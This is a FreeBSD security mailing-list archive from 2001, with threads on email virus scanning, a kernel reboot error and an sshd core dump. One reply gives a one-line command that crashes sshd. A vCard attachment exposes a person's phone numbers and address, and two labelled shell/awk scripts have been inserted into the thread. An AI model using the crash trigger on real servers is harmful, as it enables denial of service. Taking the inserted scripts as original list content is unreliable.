X-Loop: FreeBSD.org

This is a multi-part message in MIME format.

------=_NextPart_000_0019_01C0AB15.6AA82040
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Is anyone aware of any virus scanning solutions for freebsd, particularly
solutions for email? I don't trust my users not to follow proper email
guidelines, and thus would like to stop email at the server before they get
delivered the message.

Regards,
Mit

--
Will Mitayai Keeso Rowe

For full contact information, please visit:
http://my.infotriever.com/mitayai

------=_NextPart_000_0019_01C0AB15.6AA82040
Content-Type: text/x-vcard;
	name="Will Mitayai Keeso Rowe.vcf"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="Will Mitayai Keeso Rowe.vcf"

BEGIN:VCARD
VERSION:2.1
N:Rowe;Will;Mitayai Keeso
FN:Will Mitayai Keeso Rowe
NICKNAME:Mitayai
ORG:Mitayai.Net
TITLE:President
NOTE:
TEL;WORK;VOICE:(416) 934-9404
TEL;HOME;VOICE:(416) 934-0349
TEL;CELL;VOICE:(416) 561-1616
TEL;WORK;FAX:(253) 541-9915
ADR;WORK:;;#9-552 Church Street;Toronto;ON;M4Y 2E4;Canada
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:#9-552 Church Street=0D=0AToronto, ON M4Y 2E4=0D=0ACanada
ADR;HOME:;;;;;;Canada
LABEL;HOME:Canada
URL:http://www.mitayai.net/
BDAY:19701012
EMAIL;PREF;INTERNET:mit@mitayai.net
REV:20010224T192609Z
END:VCARD

------=_NextPart_000_0019_01C0AB15.6AA82040--




From owner-freebsd-security  Mon Mar 12 14:04:55 2001
Delivered-To: freebsd-security@freebsd.org
Received: from rapidnet.com (rapidnet.com [205.164.216.1])
	by hub.freebsd.org (Postfix) with ESMTP id 6BD3C37B718
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 14:04:52 -0800 (PST)
	(envelope-from traviso@RapidNet.com)
Received: from localhost (traviso@localhost)
	by rapidnet.com (8.9.3/8.9.3) with ESMTP id PAA76524;
	Mon, 12 Mar 2001 15:04:48 -0700 (MST)
Date: Mon, 12 Mar 2001 15:04:48 -0700 (MST)
From: "Travis [Admin Team]" <traviso@RapidNet.com>
To: Will Mitayai Keeso Rowe <mit@mitayai.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
In-Reply-To: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
Message-ID: <Pine.BSF.4.21.0103121504090.9893-100000@rapidnet.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:

> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don't trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.

	Greetings Mit, check out the ports collection - I believe there
are two and one front end.  To be sure, go to freebsd.org and click on
ported applications - search for virus.

Travis

/*
-=[ Travis Ogden ]-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
RapidNet Admin Team   "Courage is not defined by those who
Phone#: 605.341.3283   fought and did not fall, but by those
ICQ#:	30220771       who fought, fell, and rose again."

Mail: 	traviso@RapidNet.com		Fax#:	605.348.1031
Web:	www.RapidNet.com/~traviso	800#: 	800.763.2525	

ATTENTION! "RapidNet has moved to 330 Knollwood Drive, 
Rapid City, SD 57701."
-=-=-=-=-=-=-=-=-=-=-=-=-=-[ traviso@rapidnet.com ]=-=-=-=-=
*/




From owner-freebsd-security  Mon Mar 12 14:09:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4])
	by hub.freebsd.org (Postfix) with ESMTP id C7A9937B719
	for <freebsd-security@FreeBSD.ORG>; Mon, 12 Mar 2001 14:09:18 -0800 (PST)
	(envelope-from rsimmons@wlcg.com)
Received: from localhost (rsimmons@localhost)
	by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f2CM91077302;
	Mon, 12 Mar 2001 17:09:01 -0500 (EST)
	(envelope-from rsimmons@wlcg.com)
Date: Mon, 12 Mar 2001 17:08:57 -0500 (EST)
From: Rob Simmons <rsimmons@wlcg.com>
To: Will Mitayai Keeso Rowe <mit@mitayai.net>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: Virus Scanning Software for FreeBSD
In-Reply-To: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
Message-ID: <Pine.BSF.4.33.0103121706140.71866-100000@mail.wlcg.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Take a look at amavis-perl-10, inflex-0.1.5.c, and uvscan-4.07e.

They are in the ports collection.

uvscan-4.07e is an eval and you have to pay for it eventually, but there
aren't any opensource scanning engines that I know of.  The other two are
interfaces for something like uvscan-4.07e.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote:

> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don't trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.
>
> Regards,
> Mit
>
> --
> Will Mitayai Keeso Rowe
>
> For full contact information, please visit:
> http://my.infotriever.com/mitayai
>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6rUj9v8Bofna59hYRAjq+AJ9Wbc5o0Znrjx8RPcVybyEogUr7wwCeM/md
I49PRXYh8iBIjAAgxgmXrp0=
=Hp2V
-----END PGP SIGNATURE-----





From owner-freebsd-security  Mon Mar 12 14:11:03 2001
Delivered-To: freebsd-security@freebsd.org
Received: from atdot.dotat.org (atdot.dotat.org [150.101.89.3])
	by hub.freebsd.org (Postfix) with ESMTP id B3B7E37B71B
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 14:10:53 -0800 (PST)
	(envelope-from newton@atdot.dotat.org)
Received: (from newton@localhost)
	by atdot.dotat.org (8.11.0/8.9.3) id f2CMMeq24143;
	Tue, 13 Mar 2001 08:52:40 +1030 (CST)
	(envelope-from newton)
Date: Tue, 13 Mar 2001 08:52:40 +1030
From: Mark Newton <newton@atdot.dotat.org>
To: Will Mitayai Keeso Rowe <mit@mitayai.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
Message-ID: <20010313085240.A24044@atdot.dotat.org>
References: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>; from mit@mitayai.net on Mon, Mar 12, 2001 at 04:56:43PM -0500
X-PGP-Key: http://slash.dotat.org/~newton/pgpkey.txt
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Mon, Mar 12, 2001 at 04:56:43PM -0500, Will Mitayai Keeso Rowe wrote:

 > Is anyone aware of any virus scanning solutions for freebsd, particularly
 > solutions for email? I don't trust my users not to follow proper email
 > guidelines, and thus would like to stop email at the server before they get
 > delivered the message.

There's a sourceforge project called AMaViS - http://www.amavis.org
We're using it at work; it seems to do the right thing.

   - mark

--------------------------------------------------------------------
I tried an internal modem,                    newton@atdot.dotat.org
     but it hurt when I walked.                          Mark Newton
----- Voice: +61-4-1620-2223 ------------- Fax: +61-8-82231777 -----



From owner-freebsd-security  Mon Mar 12 14:34:19 2001
Delivered-To: freebsd-security@freebsd.org
Received: from slip-3.slip.net (slip-3.slip.net [207.171.193.17])
	by hub.freebsd.org (Postfix) with ESMTP id D281837B729
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 14:34:12 -0800 (PST)
	(envelope-from cshishid@slip.net)
Received: from cshishid by slip-3.slip.net with local (Exim 2.02 #1)
	id 14cat0-0001d8-00; Mon, 12 Mar 2001 14:33:54 -0800
Subject: Re: Virus Scanning Software for FreeBSD
To: mit@mitayai.net (Will Mitayai Keeso Rowe)
Date: Mon, 12 Mar 2001 14:33:53 -0800 (PST)
Cc: freebsd-security@freebsd.org
In-Reply-To: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net> from "Will Mitayai Keeso Rowe" at Mar 12, 2001 04:56:43 PM
X-Mailer: ELM [version 2.5 PL2]
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <E14cat0-0001d8-00@slip-3.slip.net>
From: Clark Shishido <cshishid@slip.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> 
> Is anyone aware of any virus scanning solutions for freebsd, particularly
> solutions for email? I don't trust my users not to follow proper email
> guidelines, and thus would like to stop email at the server before they get
> delivered the message.
> 

I use this procmail filter to protect myself from all kinds of malicious
content, not just known trojans or virii.

http://www.impsec.org/email-tools/procmail-security.html


It'll protect you and your mail from all those *.vbs worms out there
and those yet to be discovered.

--clark



From owner-freebsd-security  Mon Mar 12 14:40: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31])
	by hub.freebsd.org (Postfix) with ESMTP id A184337B71A
	for <freebsd-security@FreeBSD.ORG>; Mon, 12 Mar 2001 14:39:56 -0800 (PST)
	(envelope-from des@ofug.org)
Received: (from des@localhost)
	by flood.ping.uio.no (8.9.3/8.9.3) id XAA43640;
	Mon, 12 Mar 2001 23:39:54 +0100 (CET)
	(envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily
  coincide with those of any organisation or company with
  which I am or have been affiliated.
To: Spades <spades@galaxynet.org>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: rebooting error
References: <3.0.32.20010312181407.01724af8@smtp.magix.com.sg>
From: Dag-Erling Smorgrav <des@ofug.org>
Date: 12 Mar 2001 23:39:54 +0100
In-Reply-To: Spades's message of "Mon, 12 Mar 2001 18:14:08 +0800"
Message-ID: <xzpitlevcg5.fsf@flood.ping.uio.no>
Lines: 11
User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Spades <spades@galaxynet.org> writes:
> What kinda error gives this?

Please show me the output of:

 1) uname -a
 2) nm $(sysctl -n kern.bootfile) | grep \^c0309 | sort

DES
-- 
Dag-Erling Smorgrav - des@ofug.org
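Added example, not from DES's message: the lookup that "nm ... | grep \^c0309" does by eye, generalised to any fault address, as a POSIX sh/awk function that prints the nearest preceding symbol and the offset into it. The nm(1) listing below is constructed; on a real box the input is the output of nm $(sysctl -n kern.bootfile).

```shell
#!/bin/sh
# Added example, not from the thread: map a kernel fault address to the nearest
# preceding symbol in nm(1) output. DES's "grep \^c0309" does the same by eye.
# Usage: nearest_symbol <hexaddr> [nm-output-file]   (default: stdin)
nearest_symbol() {
    nmfile="${2:-/dev/stdin}"
    awk -v target="$1" '
    # POSIX awk has no strtonum(), so convert hex by hand; -1 on bad input
    function hex2dec(h,    i, c, v) {
        v = 0; h = tolower(h); sub(/^0x/, "", h)
        for (i = 1; i <= length(h); i++) {
            c = index("0123456789abcdef", substr(h, i, 1))
            if (c == 0) return -1
            v = v * 16 + c - 1
        }
        return v
    }
    BEGIN { t = hex2dec(target); best = -1 }
    # nm lines look like "<addr> <type> <name>"; undefined symbols carry no
    # address (two fields) and are skipped
    NF == 3 {
        a = hex2dec($1)
        if (a >= 0 && a <= t && a > best) { best = a; name = $3; type = $2 }
    }
    END {
        if (best < 0) { print "no symbol at or below " target; exit 1 }
        printf "%s+0x%x (%s)\n", name, t - best, type
    }' "$nmfile"
}

# constructed nm(1) excerpt standing in for: nm $(sysctl -n kern.bootfile)
nm_sample="$(mktemp "${TMPDIR:-/tmp}/kernel.nm.XXXXXX")"
trap 'rm -f "$nm_sample"' EXIT
cat > "$nm_sample" <<'EOF'
c03091a0 T trap
c0309540 T trap_pfault
c0309820 t trap_fatal
c0309900 T syscall2
         U unresolved_sym
EOF

nearest_symbol c0309560 "$nm_sample"    # trap_pfault+0x20 (T)
```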



From owner-freebsd-security  Mon Mar 12 14:48:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ldc.ro (ldc-gw.pub.ro [192.129.3.227])
	by hub.freebsd.org (Postfix) with SMTP id 94D3537B719
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 14:48:16 -0800 (PST)
	(envelope-from razor@ldc.ro)
Received: (qmail 78324 invoked by uid 666); 12 Mar 2001 22:48:13 -0000
Date: Tue, 13 Mar 2001 00:48:13 +0200
From: Alex Popa <razor@ldc.ro>
To: freebsd-security@freebsd.org
Cc: freebsd-stable@freebsd.org
Subject: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010313004813.A78221@ldc.ro>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I am not really sure what this means (could mean a lot of things, 
including bad memory on my machine), but here are the facts:

The system was cvsupped and compiled on March 10th.

$ uname -a
FreeBSD ns.ldc.ro 4.3-BETA FreeBSD 4.3-BETA #0: Sat Mar 10 15:16:38 EET 2001     root@ns.ldc.ro:/usr/src/sys/compile/NS  i386

$ ls -l /sshd.core
-rw-------  1 root  wheel  507904 Mar 12 16:40 /sshd.core
$ ls -l /usr/sbin/sshd
-r-xr-xr-x  1 root  wheel  196532 Mar 10 16:07 /usr/sbin/sshd

# gdb /usr/sbin/sshd /sshd.core
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libopie.so.2...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libmd.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libcrypt.so.2...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libcrypto.so.2...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libutil.so.3...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libz.so.2...(no debugging symbols found)...done.
Reading symbols from /usr/lib/libwrap.so.3...(no debugging symbols found)...
done.
Reading symbols from /usr/lib/libpam.so.1...(no debugging symbols found)...
done.
---Type <return> to continue, or q <return> to quit---
Reading symbols from /usr/lib/libc.so.4...(no debugging symbols found)...done.
Reading symbols from /usr/libexec/ld-elf.so.1...(no debugging symbols found)...
done.
#0  0x281741c8 in login_getpwclass () from /usr/lib/libutil.so.3
(gdb) bt
#0  0x281741c8 in login_getpwclass () from /usr/lib/libutil.so.3
#1  0x80532e8 in getsockname ()
#2  0x805a9ef in getsockname ()
#3  0x8052fd0 in getsockname ()
#4  0x804d81d in getsockname ()
#5  0x804be95 in getsockname ()
(gdb)

$ ident /usr/sbin/sshd

/usr/sbin/sshd:
     $OpenBSD: sshd.c,v 1.132 2000/10/13 18:34:46 markus Exp $
     $FreeBSD: src/crypto/openssh/sshd.c,v 1.6.2.7 2001/03/04 15:13:08 markm Exp $
     $OpenBSD: auth-rhosts.c,v 1.16 2000/10/03 18:03:03 markus Exp $
     $OpenBSD: auth-passwd.c,v 1.18 2000/10/03 18:03:03 markus Exp $
     $FreeBSD: src/crypto/openssh/auth-passwd.c,v 1.2.2.4 2001/03/04 15:13:08 markm Exp $
     $OpenBSD: auth-rsa.c,v 1.32 2000/10/14 12:19:45 markus Exp $
     $FreeBSD: src/crypto/openssh/auth-rsa.c,v 1.2.2.3 2001/01/12 04:25:55 green Exp $
     $OpenBSD: auth-rh-rsa.c,v 1.17 2000/10/03 18:03:03 markus Exp $
     $FreeBSD: src/crypto/openssh/auth-rh-rsa.c,v 1.1.1.1.2.3 2001/01/12 04:25:55 green Exp $
     $OpenBSD: pty.c,v 1.16 2000/09/07 21:13:37 markus Exp $
     $FreeBSD: src/crypto/openssh/pty.c,v 1.2.2.2 2000/10/28 23:00:49 kris Exp $
     $OpenBSD: log-server.c,v 1.17 2000/09/12 20:53:10 markus Exp $
     $OpenBSD: login.c,v 1.15 2000/09/07 20:27:52 deraadt Exp $
     $FreeBSD: src/crypto/openssh/login.c,v 1.3.2.2 2000/10/28 23:00:48 kris Exp $
     $OpenBSD: servconf.c,v 1.53 2000/10/14 12:12:09 markus Exp $
     $FreeBSD: src/crypto/openssh/servconf.c,v 1.3.2.10 2001/03/04 15:13:08 markm Exp $
     $OpenBSD: serverloop.c,v 1.34 2000/10/27 07:32:18 markus Exp $
     $OpenBSD: auth.c,v 1.11 2000/10/11 20:27:23 markus Exp $
     $FreeBSD: src/crypto/openssh/auth.c,v 1.3.2.3 2001/01/12 04:25:55 green Exp $
     $OpenBSD: auth1.c,v 1.6 2000/10/11 20:27:23 markus Exp $
     $FreeBSD: src/crypto/openssh/auth1.c,v 1.3.2.5 2001/03/04 15:13:08 markm Exp $
     $OpenBSD: auth2.c,v 1.20 2000/10/14 12:16:56 markus Exp $
     $FreeBSD: src/crypto/openssh/auth2.c,v 1.2.2.5 2001/03/04 15:13:08 markm Exp $
     $OpenBSD: auth-options.c,v 1.5 2000/10/09 21:32:34 markus Exp $
     $OpenBSD: session.c,v 1.42 2000/10/27 07:32:18 markus Exp $
     $FreeBSD: src/crypto/openssh/session.c,v 1.4.2.7 2001/02/04 20:21:06 green Exp $
     $OpenBSD: dh.c,v 1.2 2000/10/11 20:11:35 markus Exp $
     $FreeBSD: src/crypto/openssh/auth-pam.c,v 1.2.2.1 2001/01/12 04:25:54 green Exp $
     $FreeBSD: src/crypto/openssh/auth2-skey.c,v 1.2.2.1 2001/01/12 04:25:55 green Exp $
     $OpenBSD: auth2-skey.c,v 1.1 2000/10/11 20:14:38 markus Exp $
     $OpenBSD: auth-skey.c,v 1.9 2000/10/19 16:41:13 deraadt Exp $
     $FreeBSD: src/crypto/openssh/auth-skey.c,v 1.1.1.1.2.4 2001/01/12 04:25:55 green Exp $
     $OpenBSD: kex.c,v 1.12 2000/10/11 20:27:23 markus Exp $
     $OpenBSD: dispatch.c,v 1.5 2000/09/21 11:25:34 markus Exp $
     $OpenBSD: ttymodes.c,v 1.8 2000/09/07 20:27:55 deraadt Exp $
     $OpenBSD: tildexpand.c,v 1.8 2000/09/07 20:27:55 deraadt Exp $
     $OpenBSD: rsa.c,v 1.16 2000/09/07 20:27:53 deraadt Exp $
     $FreeBSD: src/crypto/openssh/rsa.c,v 1.1.1.1.2.6 2001/02/12 06:45:42 kris Exp $
     $OpenBSD: readpass.c,v 1.12 2000/10/11 20:14:39 markus Exp $
     $OpenBSD: mpaux.c,v 1.14 2000/09/07 20:27:52 deraadt Exp $
     $FreeBSD: src/crypto/openssh/mpaux.c,v 1.2.2.2 2000/10/28 23:00:48 kris Exp $
     $OpenBSD: hostfile.c,v 1.20 2000/09/07 20:27:51 deraadt Exp $
     $FreeBSD: src/crypto/openssh/hostfile.c,v 1.1.1.1.2.2 2000/10/28 23:00:48 kris Exp $
     $OpenBSD: authfile.c,v 1.20 2000/10/11 20:27:23 markus Exp $
     $FreeBSD: src/crypto/openssh/authfile.c,v 1.2.2.3 2001/01/12 04:25:55 green Exp $
     $OpenBSD: cli.c,v 1.2 2000/10/16 09:38:44 djm Exp $
     $OpenBSD: match.c,v 1.9 2000/09/07 20:27:52 deraadt Exp $
     $OpenBSD: dsa.c,v 1.11 2000/09/07 20:27:51 deraadt Exp $
     $OpenBSD: xmalloc.c,v 1.8 2000/09/07 20:27:55 deraadt Exp $
     $OpenBSD: packet.c,v 1.38 2000/10/12 14:21:12 markus Exp $
     $OpenBSD: hmac.c,v 1.4 2000/09/07 20:27:51 deraadt Exp $
     $OpenBSD: crc32.c,v 1.7 2000/09/07 20:27:51 deraadt Exp $
     $OpenBSD: compress.c,v 1.9 2000/09/07 20:27:50 deraadt Exp $
     $OpenBSD: cipher.c,v 1.37 2000/10/23 19:31:54 markus Exp $
     $FreeBSD: src/crypto/openssh/cipher.c,v 1.2.2.3 2001/01/12 04:25:56 green Exp $
     $OpenBSD: nchan.c,v 1.19 2000/09/07 20:27:52 deraadt Exp $
     $OpenBSD: channels.c,v 1.72 2000/10/27 07:48:22 markus Exp $
     $OpenBSD: canohost.c,v 1.16 2000/10/21 17:04:22 markus Exp $
     $FreeBSD: src/crypto/openssh/canohost.c,v 1.1.1.1.2.4 2001/01/12 04:25:56 green Exp $
     $OpenBSD: authfd.c,v 1.29 2000/10/09 21:51:00 markus Exp $
     $FreeBSD: src/crypto/openssh/authfd.c,v 1.2.2.4 2001/01/12 04:25:55 green Exp $
     $OpenBSD: util.c,v 1.6 2000/10/27 07:32:19 markus Exp $
     $OpenBSD: key.c,v 1.11 2000/09/07 20:27:51 deraadt Exp $
     $FreeBSD: src/crypto/openssh/key.c,v 1.4.2.2 2000/10/28 23:00:48 kris Exp $
     $OpenBSD: atomicio.c,v 1.7 2000/10/18 18:04:02 markus Exp $
     $OpenBSD: uidswap.c,v 1.9 2000/09/07 20:27:55 deraadt Exp $
     $FreeBSD: src/crypto/openssh/compat.c,v 1.1.1.1.2.3 2001/01/12 04:25:56 green Exp $
     $OpenBSD: compat.c,v 1.27 2000/10/31 09:31:58 markus Exp $
     $OpenBSD: bufaux.c,v 1.13 2000/09/07 20:27:50 deraadt Exp $
     $FreeBSD: src/crypto/openssh/bufaux.c,v 1.2.2.2 2000/10/28 23:00:47 kris Exp $
     $OpenBSD: uuencode.c,v 1.7 2000/09/07 20:27:55 deraadt Exp $
     $OpenBSD: buffer.c,v 1.8 2000/09/07 20:27:50 deraadt Exp $
     $OpenBSD: log.c,v 1.11 2000/09/30 16:27:43 markus Exp $

/var/log/all.log has this on the incident:

Mar 12 16:40:01 ns sshd[76406]: input_userauth_request: illegal user hodo
Mar 12 16:40:03 ns /kernel: pid 76406 (sshd), uid 0: exited on signal 11 (core dumped)
Mar 12 16:40:03 ns /kernel: Mar 12 16:40:03 ns /kernel: pid 76406 (sshd), uid 0: exited on signal 11 (core dumped)

From the output of "strings /sshd.core" I can see the server was doing
some pretty normal activity, like rejecting a user I know, that had an
account on another machine, but not this one.

If there is more information needed, I will try to provide it.

Thank you for listening and not panicking.

------------+------------------------------------------
Alex Popa,  |  "Artificial Intelligence is
razor@ldc.ro|         no match for Natural Stupidity"
------------+------------------------------------------
"It took the computing power of three C-64s to fly to the Moon.
It takes a 486 to run Windows 95. Something is wrong here."
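Added example, not part of Alex's report: a small sh/awk scanner for the all.log format shown above. It flags every root-owned process the kernel reports as exiting on a signal with a core dump, pairs it with the last line that pid itself logged (here the "illegal user" rejection), and reports a pid once even when syslogd has written the kernel line twice, as in the excerpt. The log lines it reads are constructed in the same format.

```shell
#!/bin/sh
# Added example, not from the original report: scan an all.log-style syslog
# file for privileged daemons that died with a core dump and show what each
# one logged last, so the admin sees what it was doing before it died.
coredump_report() {
    awk '
    # any "prog[pid]: " line: remember the most recent one per pid
    match($0, /[A-Za-z_.-]+\[[0-9]+\]: /) {
        tag = substr($0, RSTART, RLENGTH)
        sub(/^[A-Za-z_.-]+\[/, "", tag); sub(/\]: $/, "", tag)
        last[tag] = $0
    }
    # kernel crash notice for a uid 0 process; syslogd may emit the very
    # same line twice (see the excerpt), so key on the pid and report once
    /uid 0: exited on signal [0-9]+ \(core dumped\)/ && match($0, /pid [0-9]+ \(/) {
        pid = substr($0, RSTART + 4, RLENGTH - 6)
        if (pid in seen) next
        seen[pid] = 1
        print "CRASH " $0
        print "  last line from pid " pid ": " (pid in last ? last[pid] : "(none)")
    }' "$1"
}

# constructed sample in the format of the all.log excerpt above
sample_log="$(mktemp "${TMPDIR:-/tmp}/all.log.XXXXXX")"
trap 'rm -f "$sample_log"' EXIT
cat > "$sample_log" <<'EOF'
Mar 12 16:39:58 ns sshd[76399]: Accepted publickey for alex from 192.0.2.7 port 40122 ssh2
Mar 12 16:40:01 ns sshd[76406]: input_userauth_request: illegal user hodo
Mar 12 16:40:03 ns /kernel: pid 76406 (sshd), uid 0: exited on signal 11 (core dumped)
Mar 12 16:40:03 ns /kernel: Mar 12 16:40:03 ns /kernel: pid 76406 (sshd), uid 0: exited on signal 11 (core dumped)
Mar 12 16:41:10 ns cron[76420]: (root) CMD (/usr/libexec/atrun)
EOF

coredump_report "$sample_log"
```

Real use is coredump_report /var/log/all.log; the same crash notice line is what sshd's own logging cannot give you, since the process is gone by then.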



From owner-freebsd-security  Mon Mar 12 14:58:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from odin.ac.hmc.edu (Odin.AC.HMC.Edu [134.173.32.75])
	by hub.freebsd.org (Postfix) with ESMTP id 2234C37B718
	for <security@freebsd.org>; Mon, 12 Mar 2001 14:58:09 -0800 (PST)
	(envelope-from brdavis@odin.ac.hmc.edu)
Received: (from brdavis@localhost)
	by odin.ac.hmc.edu (8.11.0/8.11.0) id f2CMvsO01383;
	Mon, 12 Mar 2001 14:57:54 -0800
Date: Mon, 12 Mar 2001 14:57:54 -0800
From: Brooks Davis <brooks@one-eyed-alien.net>
To: Alex Popa <razor@ldc.ro>
Cc: security@freebsd.org
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Message-ID: <20010312145754.A489@Odin.AC.HMC.Edu>
References: <20010313004813.A78221@ldc.ro>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5;
	protocol="application/pgp-signature"; boundary="DocE+STaALJfprDB"
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <20010313004813.A78221@ldc.ro>; from razor@ldc.ro on Tue, Mar 13, 2001 at 12:48:13AM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


--DocE+STaALJfprDB
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, Mar 13, 2001 at 12:48:13AM +0200, Alex Popa wrote:
> I am not really sure what this means (could mean a lot of things,
> including bad memory on my machine), but here are the facts:

This reminds me of something I noticed during the last discussion of
ssh I got involved in and completely forgot about.  If you create an
account with a bad shell (say, /bin/false) and run the following command
you get an immediate sshd core dump:

ssh -t xxx@localhost /bin/sh

Attempting to run gdb on the core appears to show that I'm in:

#0  0x4817c3b7 in login_getpwclass () from /usr/lib/libutil.so.3

but the binary is stripped so I don't know and my /usr/obj is out of
sync with my world at the moment so I figure running gdb against the
unstripped binary is not productive.

-- Brooks

-- 
Any statement of the form "X is the one, true Y" is FALSE.
PGP fingerprint 655D 519C 26A7 82E7 2529  9BF0 5D8E 8BE9 F238 1AD4


--DocE+STaALJfprDB--



From owner-freebsd-security  Mon Mar 12 15: 2: 9 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1])
	by hub.freebsd.org (Postfix) with ESMTP
	id 780A437B719; Mon, 12 Mar 2001 15:02:03 -0800 (PST)
	(envelope-from mike@sentex.net)
Received: from chimp (fcage [192.168.0.2])
	by cage.simianscience.com (8.11.2/8.11.2) with ESMTP id f2CN1Yg55899;
	Mon, 12 Mar 2001 18:01:40 -0500 (EST)
	(envelope-from mike@sentex.net)
Message-Id: <4.2.2.20010312180009.02c135a8@marble.sentex.net>
X-Sender: mdtancsa@marble.sentex.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 
Date: Mon, 12 Mar 2001 18:01:33 -0500
To: Alex Popa <razor@ldc.ro>, freebsd-security@FreeBSD.ORG
From: Mike Tancsa <mike@sentex.net>
Subject: Re: 4.3-BETA, sshd.core found in root directory.
Cc: freebsd-stable@FreeBSD.ORG
In-Reply-To: <20010313004813.A78221@ldc.ro>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 12:48 AM 3/13/2001 +0200, Alex Popa wrote:
>I am not really sure what this means (could mean a lot of things,
>including bad memory on my machine), but here are the facts:
>
>The system was cvsupped and compiled on March 10th.


There is an open PR about this.

http://www.freebsd.org/cgi/query-pr.cgi?pr=25722

I wonder if it's exploitable?

         ---Mike
--------------------------------------------------------------------
Mike Tancsa,                          	          tel +1 519 651 3400
Network Administration,     			  mike@sentex.net
Sentex Communications                 		  www.sentex.net
Cambridge, Ontario Canada			  www.sentex.net/mike




From owner-freebsd-security  Mon Mar 12 15:22:20 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-59.dsl.lsan03.pacbell.net [63.207.60.59])
	by hub.freebsd.org (Postfix) with ESMTP id 520E037B71A
	for <security@FreeBSD.ORG>; Mon, 12 Mar 2001 15:22:16 -0800 (PST)
	(envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000)
	id 0A29266B6C; Mon, 12 Mar 2001 15:22:15 -0800 (PST)
Date: Mon, 12 Mar 2001 15:22:15 -0800
From: Kris Kennaway <kris@obsecurity.org>
To: Brooks Davis <brooks@one-eyed-alien.net>
